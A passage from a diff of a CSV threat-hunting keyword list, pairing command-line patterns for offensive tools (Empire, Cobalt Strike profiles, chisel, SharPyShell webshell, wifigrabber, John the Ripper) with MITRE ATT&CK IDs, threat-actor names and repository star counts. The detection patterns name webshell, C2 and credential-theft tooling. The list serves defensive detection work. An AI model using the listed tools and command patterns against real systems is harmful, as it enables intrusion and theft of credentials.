Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "* import Exrop*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"* -ImportDllPathPtr *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -ImportDllPathPtr *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* impress-remote-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* -inc -u=0 *.pwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* -inc=digits *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"* inceptor.*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"* inceptor.spec*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -inc -u=0 *.pwd*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* -inc=digits *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* inceptor.*dotnet*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* inceptor.spec*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "* --includeModules amass*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"* -InFile Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* -InFile Wi-Fi-PASS*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "* informix-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* informix-query.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* informix-tables.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Injector NtMapViewOfSection*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" "* -Injector VirtualAllocEx*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"* --input 10m_usernames.txt*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","60","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" -"* -InputPath .\TrustedForests.txt*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","0","N/A","8","5","472","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"* --input 10m_usernames.txt*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"* -InputPath .\TrustedForests.txt*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","0","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" "* instabf.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" "* instainsane.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","0","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z" -"* install *masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"* install *masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" "* install armitage*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" -"* install autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" -"* install backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"* install chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" +"* install autobloody*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"* install backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* install chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" "* install evil-winrm*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* install github *merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"* install github *merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "* install hekatomb*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" -"* install holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"* install holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" "* install krbjack*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" "* install nikto*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" -"* install wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"* install wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* install wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"* install wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* install wordlists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2417","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" +"* install-sb.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","0","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z" "* insTof.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" "* intel -d * -whois*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "* interact -u http*://*/*.aspx -p *","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "* --interface * --analyze --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --interface * --analyze --lm --disable-ess*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* -Internalmonologue -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"* Inveigh-*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Internalmonologue -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* Inveigh-*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 